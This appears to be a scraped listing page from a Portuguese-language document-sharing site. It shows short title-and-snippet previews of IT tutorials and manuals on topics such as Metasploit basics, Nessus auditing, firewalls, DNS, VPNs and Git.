O Windows desde... sempre! - Parte #0 O Windows desde... sempre! - Parte #0 Date : 23 de Março de 2010 No seguimento de um artigo aqui publicado há alguns meses, A história do Windows em recursos do sistema!, que criou saudade a muitos e curiosidade

Leia mais

Tutoriais de Segurança de Redes

Tutoriais de Segurança de Redes Tutoriais de Segurança de Redes Ricardo Kléber (ricardokleber@ricardokleber.com) Lição 01 :: Metasploit Básico Iniciando uma série de lições de utilização de soluções/ferramentas para a prática de segurança

Leia mais

GLPI Gestão total e gratuita do seu parque informático

GLPI Gestão total e gratuita do seu parque informático GLPI Gestão total e gratuita do seu parque informático Date : 20 de Maio de 2016 Quando se é administrador de um parque informático de escala média/grande é importante possuir as melhores plataformas para

Leia mais

8 DE NOVEMBRO DE 2015

8 DE NOVEMBRO DE 2015 Auditando e criando relatório de análise de vulnerabilidades com Nessus 8 DE NOVEMBRO DE 2015 Nessus é uma das ferramentas mais recomendadas para fazer análise de vulnerabilidade, devido apresentar uma

Leia mais

Ferramentas Web, Web 2.0 e Software Livre em EVT

Ferramentas Web, Web 2.0 e Software Livre em EVT E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o d a d i s c i p l i n a d e E d u c a ç ã o V i s u a l e T e c n o l ó g i c a MyPaint M a n

Leia mais

DESCRIÇÃO E JUSTIFICATIVAS TECNICAS SOBRE A INFLUÊNCIA DO SISTEMA OPERACIONAL NA SEGURANÇA DOS SERVIÇOS IPS

DESCRIÇÃO E JUSTIFICATIVAS TECNICAS SOBRE A INFLUÊNCIA DO SISTEMA OPERACIONAL NA SEGURANÇA DOS SERVIÇOS IPS DESCRIÇÃO E JUSTIFICATIVAS TECNICAS SOBRE A INFLUÊNCIA DO SISTEMA OPERACIONAL NA SEGURANÇA DOS SERVIÇOS IPS 1. Introdução O crescimento e a quantidade de recursos disponíveis na Internet tem chamado a

Leia mais

Ferramentas Web, Web 2.0 e Software Livre em EVT

Ferramentas Web, Web 2.0 e Software Livre em EVT Ferramentas Web, Web 2.0 e Software Livre em EVT E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o d a d i s c i p l i n a d e E d u c a ç ã o

Leia mais

Bases de Dados. Lab 1: Introdução ao ambiente

Bases de Dados. Lab 1: Introdução ao ambiente Departamento de Engenharia Informática 2009/2010 Bases de Dados Lab 1: Introdução ao ambiente 1º semestre O ficheiro bank.sql contém um conjunto de instruções SQL para criar a base de dados de exemplo

Leia mais

Fundamentos de Ethical Hacking EXIN. Guia de Preparação

Fundamentos de Ethical Hacking EXIN. Guia de Preparação Fundamentos de Ethical Hacking EXIN Guia de Preparação Edição Junho 2016 Copyright 2016 EXIN All rights reserved. No part of this publication may be published, reproduced, copied or stored in a data processing

Leia mais

Verifique a Conectividade do servidor Radius com comando dos radius AAA do teste

Verifique a Conectividade do servidor Radius com comando dos radius AAA do teste Verifique a Conectividade do servidor Radius com comando dos radius AAA do teste Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Informações de Apoio Como a característica trabalha Sintaxe

Leia mais

Network Camera. Guia do SNC easy IP setup Versão de software 1.0 Antes de operar o aparelho, leia todo este manual e guarde-o para referência futura.

Network Camera. Guia do SNC easy IP setup Versão de software 1.0 Antes de operar o aparelho, leia todo este manual e guarde-o para referência futura. 4-441-095-71 (1) Network Camera Guia do SNC easy IP setup Versão de software 1.0 Antes de operar o aparelho, leia todo este manual e guarde-o para referência futura. 2012 Sony Corporation Índice Salvar

Leia mais

Aprenda a instalar e configurar o FreeNAS (Parte I)

Aprenda a instalar e configurar o FreeNAS (Parte I) Aprenda a instalar e configurar o FreeNAS (Parte I) Date : 15 de Novembro de 2014 O FreeNAS é uma solução gratuita e livre de servidor NAS (Network Attached Storage) baseada no FreeBSD. Suporta diversos

Leia mais

Introdução ao C# (CSharp)

Introdução ao C# (CSharp) Introdução ao C# (CSharp) Date : 26 de Novembro de 2008 Nos dias que correm quem está no mundo da informática urge por importantes noções sobre programação. Não menos importante é estar actualizado nessa

Leia mais

Criar uma máquina virtual

Criar uma máquina virtual Criar uma máquina virtual Date : 19 de Janeiro de 2007 Uma forma de termos na nossa máquina sistemas operativos paralelos sem necessidade de mexer nas partições do disco é usufruir da "virtualização" de

Leia mais

Ligação entre Rocrail e a Marklin Central Station II (Por Tiago Lobo Dias www.lobodias.com - Tiagolobodias@gmail.com)

Ligação entre Rocrail e a Marklin Central Station II (Por Tiago Lobo Dias www.lobodias.com - Tiagolobodias@gmail.com) Ligação entre Rocrail e a Marklin Central Station II (Por Tiago Lobo Dias www.lobodias.com - Tiagolobodias@gmail.com) Este pequeno manual serve para ajudar a fazer a ligação entre o software Rocrail e

Leia mais

Acronis Snap Deploy 2.0 Guia de Instalação

Acronis Snap Deploy 2.0 Guia de Instalação Acronis Snap Deploy 2.0 Guia de Instalação Copyright Acronis, Inc., 2000-2008. Todos os direitos reservado. Windows e MS-DOS são marcas registradas da Microsoft Corporation. Todas as outras marcas são

Leia mais

Jessey Bullock Jeff T. Parker

Jessey Bullock Jeff T. Parker Jessey Bullock Jeff T. Parker Novatec All rights reserved. This translation is published under license with the original publisher John Wiley & Sons, Inc. Copyright 2017 by John Wiley & Sons, Inc., Indianapolis,

Leia mais

IPCop - Aprenda a instalar uma Firewall poderosa e gratuita

IPCop - Aprenda a instalar uma Firewall poderosa e gratuita IPCop - Aprenda a instalar uma Firewall poderosa e gratuita Date : 28 de Setembro de 2011 Por Tiago Ramalho para o PPLWARE Tal como tinha prometido, aqui está a continuação do artigo anterior IPCop Uma

Leia mais

Segurança de Redes 5º Semestre

Segurança de Redes 5º Semestre Segurança de Redes 5º Semestre Evasão de Firewall Prof. Nataniel Vieira nataniel.vieira@gmail.com SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL FACULDADE DE TECNOLOGIA SENAC PELOTAS Objetivos Conhecer os

Leia mais

Ferramentas Web, Web 2.0 e Software Livre em EVT

Ferramentas Web, Web 2.0 e Software Livre em EVT E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o d a d i s c i p l i n a d e E d u c a ç ã o V i s u a l e T e c n o l ó g i c a BRUSHster M a

Leia mais

Crie a sua Wikipedia com o MediaWiki em 15 minutos

Crie a sua Wikipedia com o MediaWiki em 15 minutos Crie a sua Wikipedia com o MediaWiki em 15 minutos Date : 15 de Junho de 2013 Porque continuamos a construir sites? Esta é a questão que coloco depois de nos últimos tempos terem aparecido tantas ferramentas/plataformas,

Leia mais

Este é o segundo modulo, nele abordaremos os métodos de gerenciamento do Windows Server 2008.

Este é o segundo modulo, nele abordaremos os métodos de gerenciamento do Windows Server 2008. Gerenciando o Windows Server 2008 Bem vindo(a), Este é o segundo modulo, nele abordaremos os métodos de gerenciamento do Windows Server 2008. Após essa aula você será capaz de: Definir quais são as formas

Leia mais

PERIVER PLATAFORMA INSTALLATION MANUAL. Periver_InstallationManual_ _v1.0.doc. Versão v1.0

PERIVER PLATAFORMA INSTALLATION MANUAL. Periver_InstallationManual_ _v1.0.doc. Versão v1.0 PLATAFORMA Periver_InstallationManual_2008-06-04_v1.0.doc Versão v1.0 04 de Junho de 2008 TABELA DE REVISÕES Versão Autores Descrição da Versão Aprovadores Data v0.1r António Rocha Ricardo Nobre Ricardo

Leia mais

Gerando um programa executável a partir de um módulo Python

Gerando um programa executável a partir de um módulo Python Gerando um programa executável a partir de um módulo Python Wendel Melo (Departamento de Ciência da Computação UFRJ), Notas de aula de Computação II 15/03/2012 A linguagem de programação Python segue o

Leia mais

Aprenda como interligar dois locais através de uma VPN

Aprenda como interligar dois locais através de uma VPN Aprenda como interligar dois locais através de uma VPN Date : 14 de Maio de 2015 Imagine por exemplo que tem uma empresa na Guarda e uma filial em Viseu e pretende constituir uma única rede privada (Guarda+Viseu)

Leia mais

SMA PROCEDIMENTO DE ACESSO AO SISTEMA SMA PROCEDIMENTO DE ACESSO AO SISTEMA

SMA PROCEDIMENTO DE ACESSO AO SISTEMA SMA PROCEDIMENTO DE ACESSO AO SISTEMA SMA PROCEDIMENTO DE ACESSO AO SISTEMA Índice 1. Pré-requisitos... 2 2. Configurando opções de segurança do Internet Explorer... 3 3. Requisição e Instalação dos certificados de acesso... 5 3.1. Instalação

Leia mais

Configurar um servidor de DNS no Ubuntu via Webmin

Configurar um servidor de DNS no Ubuntu via Webmin Configurar um servidor de DNS no Ubuntu via Webmin Date : 13 de Outubro de 2014 Um dos serviços mais importantes em qualquer rede é o DNS (Domain Name System)). Este serviço é responsável pela tradução

Leia mais

Transforme o seu Raspberry PI num servidor de DNS

Transforme o seu Raspberry PI num servidor de DNS Transforme o seu Raspberry PI num servidor de DNS Date : 28 de Outubro de 2013 Segundo dados divulgados recentemente no site raspberrypi.org, 1,75 milhões é o numero de mini Raspberry Pi vendidos em todo

Leia mais

COLOCANDO A REDE PARA FUNCIONAR

COLOCANDO A REDE PARA FUNCIONAR COLOCANDO A REDE PARA FUNCIONAR INTRODUÇÃO Para que uma rede de computadores exista precisamos preencher alguns requisitos tais como: 1 Devem existir 2 ou mais computadores ou então não seria necessária

Leia mais

Manual de Instalação. Servidor Web LAMP

Manual de Instalação. Servidor Web LAMP Manual de Instalação Servidor Web LAMP Instituto do Emprego e Formação Profissional - Centro de Formação Profissional de Santarém CET3 Técnico Especialista em Gestão de Redes e Sistemas Informáticos U20

Leia mais

Use Cisco CRS Clients com Microsoft Windows XP SP2

Use Cisco CRS Clients com Microsoft Windows XP SP2 Use Cisco CRS Clients com Microsoft Windows XP SP2 Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Convenções Atualizar um PC que já Executa o Cisco CRS Client para o Windows XP SP2

Leia mais

Configuração Acesso Remoto

Configuração Acesso Remoto 28/07/2014 Sumário Sumário... 2 1. Prefácio... 3 1.1 Finaliadde... 3 2. Configuração para acesso remoto com TS... 3 3. Configuração para acesso remoto com Citrix... 10 4. Configuração para acesso remoto

Leia mais

Instalação do Visual Studio 2008 beta 2 Tutorial 01

Instalação do Visual Studio 2008 beta 2 Tutorial 01 Instalação do Visual Studio 2008 beta 2 Tutorial 01 9/10/2007 Nuno Costa http://istomesmo.wordpress.com Este tutorial explica como instalar a nova versão beta 2 do Visual Studio 2008. Primeiro vamos começar

Leia mais

Segurança e Auditoria. Auditoria Coleta de dados, Análise de dados, Auditoria preventiva. de Sistemas

Segurança e Auditoria. Auditoria Coleta de dados, Análise de dados, Auditoria preventiva. de Sistemas Segurança e Auditoria Auditoria Coleta de dados, Análise de dados, Auditoria preventiva de Sistemas Auditoria Auditaria: Coleta Análise recolher dados sobre o funcionamento de um sistema ou aplicação e

Leia mais

Partilha de ficheiros por rede entre Mac e Windows

Partilha de ficheiros por rede entre Mac e Windows Partilha de ficheiros por rede entre Mac e Windows Date : 4 de Janeiro de 2010 Hoje temos um post com qualidade extra! Muitos de nós têm mais de um computador em casa, sejam Mac's, Windows, Linux,... E,

Leia mais

Manual Instalação Web Services Client Web.NewHotel

Manual Instalação Web Services Client Web.NewHotel Web.NewHotel Versão: 2008-07-10 Rev. 2008-12-04 Versão de WSServer: 2008.10.27.0 Versão de WSClient: 2008.11.03.0 Versão de NewHotel: 2008.09.13 Av. Almirante Gago Coutinho, 70 1700-031 Lisboa PORTUGAL

Leia mais

Integrated Government Resources Planning IGRP Open Source. Como importar e contribuir - GitHub. Núcleo Operacional da Sociedade de Informação

Integrated Government Resources Planning IGRP Open Source. Como importar e contribuir - GitHub. Núcleo Operacional da Sociedade de Informação Núcleo Operacional da Sociedade de Informação 23-05-2017 Integrated Government Resources Planning IGRP Open Source Como importar e contribuir - GitHub Índice Listas de Figuras... 2 Introdução... 3 Instalação

Leia mais

Tutorial para Instalação do dotproject

Tutorial para Instalação do dotproject Tutorial para Instalação do dotproject O objetivo deste tutorial é apresentar o processo de instalação do dotproject. Também serão abordadas informações sobre a instalação do pacote de tradução e possíveis

Leia mais

Git e Pais

Git e Pais Git e GitHub @Sebastião Pais O que é Git? "Git é um sistema de controle de versão distribuida, rápido e escalável" Basicamente é um versionador de ficheiros, é utilizado principalmente para gerir versões

Leia mais

Configurar o Concentradores Cisco VPN série 3000 para apoiar os recursos de expiração de senha de NT com o servidor Radius

Configurar o Concentradores Cisco VPN série 3000 para apoiar os recursos de expiração de senha de NT com o servidor Radius Configurar o Concentradores Cisco VPN série 3000 para apoiar os recursos de expiração de senha de NT com o servidor Radius Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Diagrama de

Leia mais